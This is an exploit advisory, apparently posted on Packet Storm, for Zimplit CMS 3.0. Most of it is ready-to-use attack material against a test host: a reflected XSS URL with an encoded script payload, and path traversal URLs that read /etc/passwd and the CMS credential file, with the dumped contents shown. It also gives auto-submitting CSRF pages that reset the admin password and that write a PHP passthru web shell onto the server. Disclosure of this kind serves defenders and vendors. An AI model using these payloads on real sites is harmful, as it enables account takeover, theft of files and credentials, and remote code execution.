what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zimplit CMS 3.0 Cross Site Request Forgery / Cross Site Scripting

Zimplit CMS 3.0 Cross Site Request Forgery / Cross Site Scripting
Posted Sep 13, 2013
Authored by Yashar shahinzadeh

Zimplit CMS version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 7c64f74b70c42cb2afd9280daf97f66e95d668f1a9a8b1da8249929adb843ef1

Zimplit CMS 3.0 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
###################################################################################################################################
# Exploit Title: Zimplit CMS multiple vulnerabilities
# Date: 2013 13 September
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: www.zimplit.com
# Tested on: Linux & Windows, PHP 5.3.2
# Affected Version : 3.0 (Last)
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################

Summary:
========
1. XSS (Reflected)
2. CSRF / Directory traversal
3. CSRF / Local file disclosure
4. CSRF / Change administrator's password
5. CSRF / Upload a shell
6. CSRF / too much divastating actions to do

1. XSS (Reflected):
===================
CMS suffers from cross site scripting due to lack of user's input sanitization:

File: zimplit.php (line 535)
...
...
} else {
return 'Error: The file '.$file.' does not exist.';
}
}
...
...

Exploit:
http://192.168.0.106/zimplit/zimplit.php?action=load&file=[XSS]
http://192.168.0.106/zimplit/zimplit.php?action=load&file=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28944002%29%3C%2fScRiPt%3E


2. CSRF / Directory traversal:
==============================
The following URL provides files' lists to attacker. Although it requires authorized user such as admin, with an appropriate javascript exploit an attacker is capable of having administrator's view of vulnerable link:
http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=[Directory]


File: zimplit.php (line 772 through 792)
...
...
function listFilesDir($file) {
if($file == ''){ $thedir = '.';} else { $thedir= $file;}
if ($handle = opendir($thedir)) {
while (false !== ($file = readdir($handle))) {
if (is_dir($thedir.'/'.$file)) {
if($thedir != '.'){
$files[] = $file.'|dir';
} else {
if($file != '.' && $file != '..'){
$files[] = $file.'|dir';
}
}
} else {
$files[] = $file.'|file';
}
}
closedir($handle);
}
return implode(';', $files);
}
...
...


Example:
http://192.168.0.106/zimplit/zimplit.php?action=listAllFiles&file=../../../../
Results in:
opt|dir;var|dir;tmp|dir;mnt|dir;proc|dir;boot|dir;sys|dir;..|dir;bin|dir;media|dir;srv|dir;dev|dir;vmlinuz|file;lost+found|dir;lib|dir;usr|dir;cdrom|dir;initrd.img|file;root|dir;sbin|dir;build|dir;home|dir;etc|dir;selinux|dir;.|dir


3. CSRF / Local file disclosure:
================================
The CMS suffers from LFD, like example above appropriate exploitation would be very harmful:


File: zimplit.php (line 521 through 537)
...
...
function getHTML($file) {
if (is_file($file)) {
if (is_readable($file)) {

$content = file_get_contents($file);
if ($content === FALSE) {
return 'Error: Cannot read from the file '.$file.'.';
}

return $content;
} else {
return 'Error: The file '.$file.' is not readable.';
}
} else {
return 'Error: The file '.$file.' does not exist.';
}
}
...
...

Exploit:
http://192.168.0.106/zimplit/zimplit.php?action=load1&file=[Path to file]

Examples:
http://192.168.0.106/zimplit/zimplit.php?action=load1&file=../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
yasho:x:1000:1000:Yasho,,,:/home/yasho:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
jetty:x:117:124::/usr/share/jetty:/bin/false
smmta:x:118:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:119:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false


Following exploit would lead to gathering administrator's username and password:
http://192.168.0.106/zimplit/zimplit.php?action=load1&file=security.php
<?php $u="yashar"; $p="dd0eaddc303999363896ceaad3458ecc"; $e="y.shahinzadeh@gmail.com"; $s="7xftg9by0nh97wso7pmd"; $r=""; ?>



4. CSRF / Change administrator's password:
==========================================
Following exploit results in changing administrator's credentials:

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm" action="http://192.168.0.106/zimplit/zimplit.php?action=changeuserpass" method="post">
<input type="hidden" name="username" value="yashar">
<input type="hidden" name="password" value="yashar">
<input type="hidden" name="content" value="y.shahinzadeh@gmail.com">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

A random token would be a good prevention.


5. CSRF / Upload a shell
==========================================
Exploitation of this hole is semi complicated compared with previous ones, it has two steps must be taken separately. Firstly, a blank file must be created on the remote machine. Afterwards, the malisious contents are injected into it:

<html>
<img src="http://192.168.0.106/zimplit/zimplit.php?action=new&file=shell.php" width="1" height="1">

<body onload="submitForm()">
<form name="myForm" id="myForm" action="http://192.168.0.106/zimplit/zimplit.php?action=save&file=shell.php" method="post">
<input type="hidden" name="html" value="<?php passthru('ls -la'); ?>">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

total 608
drwxrwxrwx 7 yasho yasho 4096 Sep 13 04:27 .
drwxr-xr-x 13 yasho yasho 4096 Sep 13 02:45 ..
-rw-r--r-- 1 www-data www-data 77873 Sep 13 02:14 58.zip
drwxrwxrwx 2 www-data www-data 4096 Sep 13 02:14 Z-files
drwxrwxrwx 2 www-data www-data 4096 Sep 13 02:14 Z-pictures
drwxrwxrwx 2 yasho yasho 4096 Sep 23 2009 Z-scripts
-rwxrwxrwx 1 yasho yasho 845 Sep 22 2009 Zconfig.php
-rw-r--r-- 1 www-data www-data 274 Sep 13 02:14 Zmenu.js
-rw-r--r-- 1 www-data www-data 86 Sep 13 02:14 Zsettings.js
drwxrwxrwx 7 yasho yasho 4096 Sep 23 2009 editor
drwxr-xr-x 2 www-data www-data 4096 Sep 13 02:14 images
-rw-r--r-- 1 www-data www-data 5789 Sep 13 02:14 index.html
-rw-r--r-- 1 www-data www-data 124 Sep 13 03:02 security.php
-rw-rw-rw- 1 www-data www-data 28 Sep 13 04:27 shell.php
-rw-r--r-- 1 yasho yasho 7 Sep 13 02:16 test.txt
-rwxrwxrwx 1 yasho yasho 37633 Sep 24 2009 zimplit.php
-rwxrwxrwx 1 yasho yasho 437955 Sep 13 00:58 zimplit_cms_3.0_standalone.zip


6. CSRF / too much divastating actions to do:
=============================================
I'm sure there will be more attacks, I just indicate some important ones.

/** Yasshar shahinzadeh **/
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close